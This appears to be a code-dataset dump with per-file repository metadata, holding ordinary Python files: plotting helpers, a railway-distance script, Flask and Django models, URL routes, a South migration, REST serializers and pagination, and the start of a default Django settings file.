verticalalignment='center',
fontweight='demibold',
fontsize=fs,
transform=ax.transAxes)
def simplify_axes(axes):
"""
Removes top and right spines from axes
Parameters
----------
axes: list
List of Matplotlib axes to simplify
"""
if not type(axes) is list:
axes = [axes]
for ax in axes:
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
def color_axes(axes, color):
"""
Colors axes spines
Parameters
----------
axes: list
List of Matplotlib axes to simplify
color: Matplotlib color
The color to be used
"""
if not type(axes) is list:
axes = [axes]
for ax in axes:
ax.tick_params(axis='x', colors=color)
ax.tick_params(axis='y', colors=color)
for spine in ax.spines.values():
spine.set_edgecolor(color)
####### HELPER #########
def _rotation_matrix(axis, theta):
"""
Return the rotation matrix associated with counterclockwise rotation about
the given axis by theta radians.
"""
axis = np.asarray(axis)
theta = np.asarray(theta)
axis = axis / np.linalg.norm(axis)
a = math.cos(theta / 2.0)
b, c, d = -axis * math.sin(theta / 2.0)
aa, bb, cc, dd = a * a, b * b, c * c, d * d
bc, ad, ac, ab, bd, cd = b * c, a * d, a * c, a * b, b * d, c * d
return np.array([[aa + bb - cc - dd, 2 * (bc + ad), 2 * (bd - ac)],
[2 * (bc - ad), aa + cc - bb - dd, 2 * (cd + ab)],
[2 * (bd + ac), 2 * (cd - ab), aa + dd - bb - cc]])
def _rotation_matrix_sin(d):
"""
Calculates a rotation matrix given a vector d. The direction of d
corresponds to the rotation axis. The length of d corresponds to
the sin of the angle of rotation.
Variant of: http://mail.scipy.org/pipermail/numpy-discussion/2009-March/040806.html
"""
sin_angle = np.linalg.norm(d)
if sin_angle == 0:
return np.identity(3)
d /= sin_angle
sin_angle = np.linalg.norm(d)
eye = np.eye(3)
ddt = np.outer(d, d)
skew = np.array([[0, d[2], -d[1]],
[-d[2], 0, d[0]],
[d[1], -d[0], 0]], dtype=np.float64)
M = ddt + np.sqrt(1 - sin_angle ** 2) * (eye - ddt) + sin_angle * skew
return M
def _cylinder(pos_start, direction, length, radius, n_points):
# Build cylinder pointing to positive x-direction with right radius and length
alpha = np.array([0., length])
theta_ring = np.linspace(0., np.pi * 2., int(n_points))
r = radius
x = np.zeros((theta_ring.size * alpha.size))
y = np.zeros((theta_ring.size * alpha.size))
z = np.zeros((theta_ring.size * alpha.size))
for idx_alpha, crt_alpha in enumerate(alpha):
x[idx_alpha * theta_ring.size:(idx_alpha + 1) * theta_ring.size] = r * np.cos(theta_ring)
y[idx_alpha * theta_ring.size:(idx_alpha + 1) * theta_ring.size] = r * np.sin(theta_ring)
z[idx_alpha * theta_ring.size:(idx_alpha + 1) * theta_ring.size] = crt_alpha * np.ones(theta_ring.size)
# rotate cylinder to match direction
#
# - rho: length of vector projection on x-y plane
# - phy: angle of rotation wrt y-axis
# - theta: angle of rotation wrt z-axis
y_axis = np.array([0., 1., 0.])
z_axis = np.array([0., 0., 1.])
if direction[0] == 0:
theta = -np.sign(direction[1]) * np.pi / 2.
else:
if direction[0] > 0:
theta = -np.arctan(direction[1] / direction[0])
else:
theta = np.pi - np.arctan(direction[1] / direction[0])
rho = np.sqrt((direction[0] ** 2 + direction[1] ** 2))
if rho == 0:
if direction[2] > 0:
phi = 0.
else:
phi = np.pi
else:
phi = -(np.pi / 2. - np.arctan(direction[2] / rho))
rot1_m = _rotation_matrix(y_axis, phi)
rot2_m = _rotation_matrix(z_axis, theta)
for idx, (crt_x, crt_y, crt_z) in enumerate(zip(x, y, z)):
crt_v = np.array([crt_x, crt_y, crt_z])
crt_v = np.dot(crt_v, rot1_m)
crt_v = np.dot(crt_v, rot2_m)
x[idx] = crt_v[0]
y[idx] = crt_v[1]
z[idx] = crt_v[2]
# move cylinder to start position
x += pos_start[0]
y += pos_start[1]
z += pos_start[2]
return x, y, z
| [
"[email protected]"
] | |
a39a79b5d049d2d800419e17ce8a75303519cca7 | 8e1199e846f0f1b0a7636d0fa759dff2afe68dd6 | /switch/__init__.py | 4992c1d3c580dd9ff392bb9d17136e0c2945f80f | [
"BSD-3-Clause"
] | permissive | jeffseif/switch | 294494ad5cf87c09db2ffa82dd4de04de63ae970 | c1eec77528d8780c43f8335daa2c7f523c4b263e | refs/heads/main | 2022-10-28T06:07:15.510115 | 2022-10-08T22:02:52 | 2022-10-08T22:02:52 | 88,374,702 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | __author__ = "Jeffrey Seifried"
__description__ = "Scraping tools for getting me a damn Nintendo Switch"
__program__ = "switch"
__version__ = "1.0.0"
__year__ = "2017"
HEADERS = {
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "en-US,en;q=0.8",
"Connection": "keep-alive",
"Referer": "https://www.google.com/",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36", # noqa
}
TTL = 600 # IO caches will be ignored after 10 minutes
| [
"[email protected]"
] | |
a6f138a19ec6c83dc6e886ac72714b58bd445869 | ea9cf32c2c0c61d4747fce4e11c3f632ca0a1a2e | /start_railway_data_create.py | f42ba338dca725b0a64c4665e67a894fb7d31e1c | [] | no_license | yukou-isshiki/most_longest_ticket_root_calc | 5b7eab4af3e3e7cd572b0e684345c138e5e6b50f | 48e351a0705a2faff2da8970b6497b4687198b85 | refs/heads/master | 2023-04-01T00:53:01.875783 | 2023-03-15T14:00:32 | 2023-03-15T14:00:32 | 182,359,346 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | erea = ""
file1 = f"all_line_data/{erea}_all_line_data.txt"
f = open(file1, "r")
lines = f.readlines()
station_dict = {}
for line in lines:
line_data = line.split(",")
for i in range(0,2):
if line_data[i] not in station_dict:
station_dict[line_data[i]] = 1
else:
station_dict[line_data[i]] = station_dict[line_data[i]] + 1
start_list = []
# 分岐駅と隣駅でも分割する
for line in lines:
line_data = line.split(",")
if station_dict[line_data[0]] > 2:
if (line_data[1] not in start_list) and (station_dict[line_data[1]] == 2):
start_list.append(line_data[1])
elif station_dict[line_data[1]] > 2:
if (line_data[0] not in start_list) and (station_dict[line_data[0]] == 2):
start_list.append(line_data[0])
start = ""
end = ""
distance = 0
file2 = f"graphillion_data/{erea}_start_graphillion.txt"
f2 = open(file2, "w")
stop_station_list = [] # 分岐駅では無いが、路線名が途中で変わる駅(神戸・金沢等)や、強制的に分割したい駅をリスト形式で入れる
for line in lines:
line_data = line.split(",")
if start == "":
start = line_data[0]
if (station_dict[line_data[1]] != 2) or (line_data[1] in stop_station_list) or (line_data[1] in start_list):
end = line_data[1]
if end == "":
distance += float(line_data[2])
distance = round(distance, 1)
else:
distance += round(float(line_data[2]),2)
distance = round(distance, 1)
print("{0},{1},{2}".format(start, end, distance))
write_list = [start, end, str(distance)]
write_line = ",".join(write_list)
f2.write(write_line)
f2.write("\n")
start = ""
end = ""
distance = 0
f.close()
f2.close() | [
"[email protected]"
] | |
ee8c93abd46bc299d57fa391eda1859876206a33 | 949586a3ed05f02bda4cb618c763b66e4cb36555 | /listOrTuple.py | eaa109fe158f94a46f7920fef66bc6b7b1b57e98 | [] | no_license | cjohannsen81/pythonscripts | 51ff100d8d2100718e51fd888510fbb76bf811be | cc6fd84bf185455e027cafd27a98505bf449ea8c | refs/heads/master | 2020-06-03T23:46:43.774703 | 2013-10-02T17:15:14 | 2013-10-02T17:15:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | t = ("ich","bin","ein","tuple")
print t
l = []
for i in t:
l.append(i)
l.insert(3, "fake")
print l
| [
"[email protected]"
] | |
f53c1b689ee5c4ad02f76119da9f93805dfd9b8e | 936d88d5d91119a31b64b177eb31754c969ba52d | /study/p02-2-findmaxidx.py | 17f81a88aa802879e273da43a44b71769dce66e5 | [] | no_license | gtg7784/algorithm-study | 4df3f56bae3506795d7c46feae4a17badb61c4a9 | 82d43b6928a626f0b4854bcc6ad2429861f53960 | refs/heads/master | 2021-05-21T08:26:39.113630 | 2020-09-03T18:10:26 | 2020-09-03T18:10:26 | 252,618,845 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | # 최댓값의 위치 구하기
# 입력: 숫자가 n개 들어있는 리스트
# 출력: 숫자 n개 중 최댓값의 위치
# 시간복잡도: O(n)
def find_max_idx(a):
n = len(a)
max_idx = 0
for i in range(1, n):
if a[i] > a[max_idx]:
max_idx = i
return max_idx
v = [17, 92, 18, 33, 58, 7, 33, 42]
print(find_max_idx(v)) | [
"[email protected]"
] | |
701531476b09a2943070aaede0e4651e6c1fb273 | f990a00c7116f6e3317e834129f5af7435b5e50b | /app/models.py | c28b2be37709725dda2039ff91d3fefa3b43b499 | [] | no_license | gabsw/cs50w_project1_bookclub | dc44debfb83c623af6627a8103edce1eb5401259 | c453e110faadbd10d694be1fe64402cd547e7db2 | refs/heads/master | 2022-12-12T12:36:46.002572 | 2019-01-22T20:55:27 | 2019-01-22T20:55:27 | 167,066,199 | 0 | 0 | null | 2021-06-01T23:17:59 | 2019-01-22T20:57:53 | Python | UTF-8 | Python | false | false | 2,297 | py | from flask_login import UserMixin
from werkzeug.security import check_password_hash
class User(UserMixin):
def __init__(self, username, password_hash, user_id=None):
self.username = username
self.password_hash = password_hash
self.user_id = user_id
def get_id(self):
return self.user_id
def check_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def create_from_db_record(record):
# getattr gets the named attribute from the record, if it exists
# if it doesn't exist, returns a default value, which is set to None below
# getattr(record, "username", None)
return User(record.username, record.password_hash, record.id)
class Review:
def __init__(self, body, score, book_id, user_id, review_id=None):
self.body = body
self.score = score
self.book_id = book_id
self.user_id = user_id
self.review_id = review_id
@staticmethod
def create_from_db_record(record):
# this wont work for all queries, as one of them doesnt ask for the ids
return Review(record.body, record.score, record.book_id, record.user_id, record.id)
class Book:
def __init__(self, title, author, publication_year, isbn, book_id=None):
self.title = title
self.author = author
self.publication_year = publication_year
self.isbn = isbn
self.book_id = book_id
@staticmethod
def create_from_db_record(record):
return Book(record.title, record.author, record.publication_year, record.isbn, record.id)
class ReviewWithUser:
def __init__(self, username, body, score):
self.username = username
self.body = body
self.score = score
@staticmethod
def create_from_db_record(record):
return ReviewWithUser(record.username, record.body, record.score)
class UserRating:
def __init__(self, username, body, score, title, isbn):
self.username = username
self.body = body
self.score = score
self.title = title
self.isbn = isbn
@staticmethod
def create_from_db_record(record):
return UserRating(record.username, record.body, record.score, record.title, record.isbn) | [
"[email protected]"
] | |
6ae9649f2b68a722ce030ec1b2bfe719d32a8c8f | 9bf6adb1d3795c24cc28b6a6901052cdb7e6034a | /end/project1/bookdemo/booktest/urls.py | 2586ea9f5b68d35a059efd0e6d7e5037515d9148 | [] | no_license | 1552965337/py1911 | abffc3a3a7fef33a00fc2ef91c834586c4adbf4a | 18c8876b63134d158ea26972b278f78720f83b19 | refs/heads/master | 2023-01-28T08:39:40.477794 | 2020-03-16T11:25:01 | 2020-03-16T11:25:01 | 239,445,710 | 0 | 0 | null | 2023-01-05T09:06:11 | 2020-02-10T06:45:58 | JavaScript | UTF-8 | Python | false | false | 1,152 | py | # author sqz
# date 2020/2/13 14:35
# file_name urls
from django.conf.urls import url
from . import views
app_name = "booktest"
# 2. 每一个路由文件中必须编写路由数据
urlpatterns = [
# url 第一个参数作为正则表达式 为了匹配输入的网址 第二个参数为需要执行的视图函数
# url(r'^index/$',views.index),
url(r'^$', views.index, name='index'),
# 使用正则分组可以向视图函数中传递参数
# 第一个参数就是路由 第二个参数就是视图函数
# 第一个参数中如果有正则分组 小括号 则正则分组匹配的内容会作为实参传递给视图函数
url(r'^detail/(\d+)/$', views.detail, name='detail'),
url(r'^about/$', views.about, name='about'),
url(r'^deletebook/(\d+)/$', views.deletebook, name='deletebook'),
url(r'^addbook/$', views.addbook, name='addbook'),
url(r'^editbook/(\d+)/$', views.editbook, name='editbook'),
url(r'^addhero/(\d+)/$', views.addhero, name='addhero'),
url(r'^edithere/(\d+)/$', views.edithere, name='edithere'),
url(r'^deletehero/(\d+)/$', views.deletehero, name='deletehero'),
]
| [
"[email protected]"
] | |
ba425adbaa18ee9c01e0b440da77fecc0b2b5ada | cc270b86d4b063f22af2aa197bf0f90175f0fe58 | /santiago/migrations/0022_auto__add_field_userchipcount_bank_chips.py | b579eef469ee6157834e5c607827d77cf0d11c42 | [] | no_license | ardiangashi237/poker | 57c809ce5c96b174fe8ccccc04d9e49ae6fd411a | 942935ec634f91cca3285905868ea806c5677964 | refs/heads/master | 2020-05-16T20:51:04.893840 | 2013-08-19T14:11:16 | 2013-08-19T14:11:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,017 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserChipCount.bank_chips'
db.add_column('santiago_userchipcount', 'bank_chips',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserChipCount.bank_chips'
db.delete_column('santiago_userchipcount', 'bank_chips')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'santiago.buyin': {
'Meta': {'object_name': 'BuyIn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live_chips': ('django.db.models.fields.IntegerField', [], {}),
'real_chips': ('django.db.models.fields.IntegerField', [], {}),
'table': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['santiago.PokerTable']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'santiago.chippackage': {
'Meta': {'object_name': 'ChipPackage'},
'chip_qty': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'})
},
'santiago.chiptransaction': {
'Meta': {'object_name': 'ChipTransaction'},
'chips': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'santiago.faq': {
'Meta': {'object_name': 'Faq'},
'answer': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['santiago.FaqCategory']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sequence': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'})
},
'santiago.faqcategory': {
'Meta': {'object_name': 'FaqCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'sequence': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'})
},
'santiago.membershiplevel': {
'Meta': {'object_name': 'MembershipLevel'},
'ad_required_for_top_up': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'allow_chip_purchases': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'daily_top_up_threshold': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'santiago.pokernetchipcount': {
'Meta': {'object_name': 'PokernetChipCount', 'db_table': "u'user2money'"},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'currency_serial': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'points': ('django.db.models.fields.BigIntegerField', [], {}),
'rake': ('django.db.models.fields.BigIntegerField', [], {}),
'user_serial': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'})
},
'santiago.pokernetuser': {
'Meta': {'object_name': 'PokernetUser', 'db_table': "u'users'"},
'affiliate': ('django.db.models.fields.IntegerField', [], {}),
'created': ('django.db.models.fields.IntegerField', [], {}),
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'blank': 'True'}),
'future_rating': ('django.db.models.fields.FloatField', [], {}),
'games_count': ('django.db.models.fields.IntegerField', [], {}),
'locale': ('django.db.models.fields.CharField', [], {'max_length': '96'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '192'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '96'}),
'privilege': ('django.db.models.fields.IntegerField', [], {}),
'rating': ('django.db.models.fields.IntegerField', [], {}),
'serial': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'skin_image': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'skin_image_type': ('django.db.models.fields.CharField', [], {'max_length': '96', 'blank': 'True'}),
'skin_outfit': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'skin_url': ('django.db.models.fields.CharField', [], {'max_length': '765'})
},
'santiago.pokertable': {
'Meta': {'object_name': 'PokerTable', 'db_table': "u'pokertables'"},
'average_pot': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'betting_structure': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'currency_serial': ('django.db.models.fields.IntegerField', [], {}),
'hands_per_hour': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'muck_timeout': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'observers': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'percent_flop': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'player_timeout': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'players': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'resthost_serial': ('django.db.models.fields.IntegerField', [], {}),
'seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'serial': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'skin': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'tourney_serial': ('django.db.models.fields.IntegerField', [], {}),
'variant': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'waiting': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'santiago.registrationprofile': {
'Meta': {'object_name': 'RegistrationProfile'},
'activation_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'client_host': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'client_ip': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'santiago.registrationprofileverification': {
'Meta': {'object_name': 'RegistrationProfileVerification'},
'client_host': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'client_ip': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'registration_profile': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'verification'", 'unique': 'True', 'to': "orm['santiago.RegistrationProfile']"}),
'verified': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'santiago.securityquestion': {
'Meta': {'object_name': 'SecurityQuestion'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'santiago.userchipcount': {
'Meta': {'object_name': 'UserChipCount'},
'bank_chips': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live_chips': ('django.db.models.fields.IntegerField', [], {}),
'real_chips': ('django.db.models.fields.IntegerField', [], {}),
'serial': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True'})
},
'santiago.usermembershiplevelhistory': {
'Meta': {'object_name': 'UserMembershipLevelHistory'},
'effective_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['santiago.MembershipLevel']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'santiago.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'birthdate': ('django.db.models.fields.DateField', [], {}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'current_member_level': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['santiago.MembershipLevel']"}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'phone': ('django.contrib.localflavor.us.models.PhoneNumberField', [], {'max_length': '20'}),
'pin_delivery': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'security_answer': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'security_question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['santiago.SecurityQuestion']"}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'street1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'street2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '64'})
}
}
complete_apps = ['santiago'] | [
"[email protected]"
] | |
84d104ca8934b9f9c81f8de3b00aa4b83d84372b | 71610a0586f77307664dcf3c5f216687db7681d0 | /hack104_rec/template/__init__.py | b51695f6a268429f3342e66072b3663654dbd3a9 | [] | no_license | d2207197/hack104-rec | c441fa24a481af1acef0b89745dfff7b73b383c4 | 9385d6f69b089901688e83cf740a576e32722bfa | refs/heads/master | 2020-03-22T00:33:15.652868 | 2018-07-16T16:00:47 | 2018-07-16T16:00:47 | 139,252,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | from jinja2 import Environment, PackageLoader, select_autoescape
env = Environment(
loader=PackageLoader('hack104_rec', 'template'),
autoescape=select_autoescape(['html', 'xml', 'j2'])
)
| [
"[email protected]"
] | |
3a5d61ca6da2b49eba30877f7dc5cc07d4e525df | 0a27d046e21c3ae385e0109e41b90717b12ed3c7 | /apps/arena/serializers.py | fd8a5659281d546466be61192fd7da9e42f78f1e | [] | no_license | bbright3493/gz_v1.0.0 | 375716b26ed4b3221090adc58755de564aa12c3c | 9205dfd8dd0c822a9f5352db845fc12c319db3e3 | refs/heads/master | 2020-03-26T01:17:25.085015 | 2019-02-11T07:40:23 | 2019-02-11T07:40:23 | 144,360,492 | 0 | 2 | null | 2018-09-23T05:58:35 | 2018-08-11T06:13:02 | JavaScript | UTF-8 | Python | false | false | 1,971 | py |
from rest_framework import serializers
from apps.user_relationship.models import UserAchievement
from .models import *
class TotalRankSerializers(serializers.ModelSerializer):
"""
总排行榜序列化
"""
class Meta:
model = UserAchievement
fields = "__all__"
depth = 1
class WeekRankSerializers(serializers.ModelSerializer):
"""
周排行榜序列化
"""
class Meta:
model = UserAchievement
fields = "__all__"
depth = 1
class ClassRankSerializers(serializers.ModelSerializer):
"""
日排行榜序列化
"""
class Meta:
model = UserAchievement
fields = "__all__"
depth = 1
class PassSerializer(serializers.ModelSerializer):
"""
关卡信息序列化
"""
class Meta:
model = Pass
fields = "__all__"
class UserPassSerializer(serializers.ModelSerializer):
"""
用户关卡信息序列化
"""
class Meta:
model = UserPass
fields = "__all__"
class ChallengerSerializer(serializers.ModelSerializer):
"""
挑战者信息序列化
"""
class Meta:
model = Challenger
fields = "__all__"
class UserPkExerciseSerializers(serializers.ModelSerializer):
"""
pk题目信息序列化
"""
class Meta:
model = UserPkExercise
fields = "__all__"
class PkDetailSerializers(serializers.ModelSerializer):
"""
pk详情信息序列化
"""
user_pk_exec = UserPkExerciseSerializers(many=True)
class Meta:
model = UserPkDetail
fields = "__all__"
class TeamCompSerializers(serializers.ModelSerializer):
"""
团赛信息序列化
"""
class Meta:
model = TeamComp
fields = "__all__"
class UserTeamCompSerializers(serializers.ModelSerializer):
"""
用户团赛信息序列化
"""
class Meta:
model = UserTeamComp
fields = "__all__"
| [
"[email protected]"
] | |
8ff9fb1c0b04a24964e36fc719086182632ad5e7 | a1a166011a5a76c2a9e83316927649b7a60ce4e5 | /resources/pagination.py | 370bb14273c6ccfa1f13cb76533130d8a3718f21 | [
"MIT"
] | permissive | CityOfHameenlinna/hmlvaraus-backend | 5e60c33e624b2d7984a6ddabbc465e8640010a50 | 181898f3c947298949adaf2156ad2d25da1e6002 | refs/heads/master | 2020-03-13T05:30:03.851534 | 2018-05-30T06:49:13 | 2018-05-30T09:34:16 | 130,985,577 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from rest_framework.pagination import PageNumberPagination, _positive_int
class DefaultPagination(PageNumberPagination):
page_size = 20
page_size_query_param = 'page_size' # Allow client to override, using `?page_size=xxx
max_page_size = 100
class PurposePagination(DefaultPagination):
page_size = 40
class ReservationPagination(DefaultPagination):
def get_page_size(self, request):
if self.page_size_query_param:
cutoff = self.max_page_size
if request.query_params.get('format', '').lower() == 'xlsx':
cutoff = 50000
try:
return _positive_int(
request.query_params[self.page_size_query_param],
strict=True, cutoff=cutoff
)
except (KeyError, ValueError):
pass
return self.page_size
| [
"[email protected]"
] | |
0a81d515dbb95bd8f5d2f769c3598c4d7aa27146 | c9657a8d71fcc5d90727567b88f555d6f092698d | /month03/django/day02/mysite1/mysite1/settings.py | 02caae91e8b9c941dd3b8771459f06634dd63812 | [] | no_license | xiashuo/tedu_execises | a44a9e54283c221c7708081a57610c0338705cc4 | fc1a9051903817df0d796357714f9403e929f5a2 | refs/heads/master | 2022-11-20T08:54:14.118094 | 2020-07-19T16:24:06 | 2020-07-19T16:24:06 | 270,349,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,094 | py | """
Django settings for mysite1 project.
Generated by 'django-admin startproject' using Django 2.2.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'z2$$s4k&$vqg&-(vjb!u)h-ff7#+u=v@fo+*r614nvy%%tq1=)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
